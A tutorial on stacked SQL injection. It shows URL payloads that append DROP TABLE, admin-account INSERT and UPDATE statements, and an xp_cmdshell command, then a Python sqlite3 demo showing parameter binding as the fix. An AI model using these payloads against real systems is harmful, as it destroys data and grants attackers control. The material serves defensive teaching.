Stacked queries (also called batched queries or piggy-backed queries) are a SQL injection technique in which the attacker terminates the original query with a semicolon and appends additional SQL statements. This enables operations beyond data retrieval, such as INSERT, UPDATE, DELETE, or even administrative commands.
Some database drivers allow multiple SQL statements in a single query. By injecting a semicolon followed by arbitrary SQL, an attacker can execute completely new commands that are independent of the original query.
// Original query
SELECT * FROM products WHERE id=1
// Stacked query injection
GET /product?id=1; DROP TABLE users--
// Result: Two queries executed:
// 1. SELECT * FROM products WHERE id=1
// 2. DROP TABLE users
Common malicious operations:
// Add admin user
GET /product?id=1; INSERT INTO users VALUES('hacker','pass123',1)--
// Modify data
GET /product?id=1; UPDATE users SET role='admin' WHERE user='attacker'--
// Execute system commands (SQL Server)
GET /product?id=1; EXEC xp_cmdshell('whoami')--
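
The driver dependence described above can be checked from the defender's side. The following is an added example, not code from the original page: it uses Python's built-in sqlite3 module as a stand-in driver, and the in-memory schema and function names are constructed for the demonstration. It feeds the `1; DROP TABLE users--` value from the first example to a multi-statement API, a single-statement API, and a bound parameter, and reports whether the users table survives.

```python
import sqlite3

PAYLOAD = "1; DROP TABLE users--"  # the id value from the example above

def fresh_db():
    """Constructed in-memory schema for the demo (not from the page)."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE products (id INTEGER, name TEXT);"
        "CREATE TABLE users (name TEXT);"
        "INSERT INTO products VALUES (1, 'widget');"
        "INSERT INTO users VALUES ('alice');"
    )
    return db

def users_table_exists(db):
    row = db.execute(
        "SELECT count(*) FROM sqlite_master WHERE type='table' AND name='users'"
    ).fetchone()
    return row[0] == 1

def concat_multi_statement_api(value):
    """Vulnerable: concatenated SQL sent to an API that runs every statement."""
    db = fresh_db()
    db.executescript("SELECT * FROM products WHERE id=" + value)
    return users_table_exists(db)

def concat_single_statement_api(value):
    """Concatenation is still injectable here; the driver only blocks stacking."""
    db = fresh_db()
    try:
        db.execute("SELECT * FROM products WHERE id=" + value)
        rejected = False
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        rejected = True  # exception class differs between Python versions
    return rejected, users_table_exists(db)

def bound_parameter(value):
    """Fixed: the whole input is bound as one value and never parsed as SQL."""
    db = fresh_db()
    rows = db.execute("SELECT * FROM products WHERE id=?", (value,)).fetchall()
    return rows, users_table_exists(db)

if __name__ == "__main__":
    print("multi-statement API, users table survives:", concat_multi_statement_api(PAYLOAD))
    print("single-statement API (rejected, survives):", concat_single_statement_api(PAYLOAD))
    print("bound parameter (rows, survives):", bound_parameter(PAYLOAD))
```

A driver that refuses a second statement removes the stacking primitive only; the concatenated query remains injectable in other ways, so parameter binding is the fix to apply.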